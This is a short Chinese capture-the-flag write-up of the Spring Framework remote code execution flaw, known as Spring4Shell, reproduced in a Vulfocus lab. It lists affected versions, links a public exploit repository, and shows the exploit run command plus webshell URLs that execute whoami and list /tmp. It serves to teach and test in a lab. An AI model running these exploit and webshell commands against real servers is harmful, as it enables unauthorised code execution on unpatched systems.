1. 漏洞介绍
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。
2、受影响版本
- Spring Core <= 5.2.19, <= 5.3.17
- Spring Boot <= 2.6.5
3、利用前提
- JDK 9 及以上版本
- Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
- Tomcat服务器
4.漏洞复现
1.打开vulfocus靶场环境,输入访问地址进入之后为以下 ok


2,接下来下载github上的开源exp文件
https://github.com/craig/SpringCore0day

3.下载好之后在下载好的文件内打开终端 输入以上访问地址来检测
python3 exp.py --url http://123.58.236.76:43269/

4.检测发现漏洞存在并附上url地址访问
漏洞存在,shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami
5.访问已经是root权限,flag在tmp文件下

6.直接输入文件下tmp位置即可得到flag
http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp

即可通关

本文介绍了Spring Framework的一个远程代码执行漏洞,该漏洞影响JDK9及以上版本的特定Spring Core和Spring Boot版本。攻击者可以利用此漏洞在受影响的系统上执行恶意代码。复现步骤包括使用Vulfocus靶场、下载开源EXP文件并进行测试,最终获取shell权限并找到flag。建议受影响的用户尽快升级到安全版本。
3999

被折叠的 条评论
为什么被折叠?



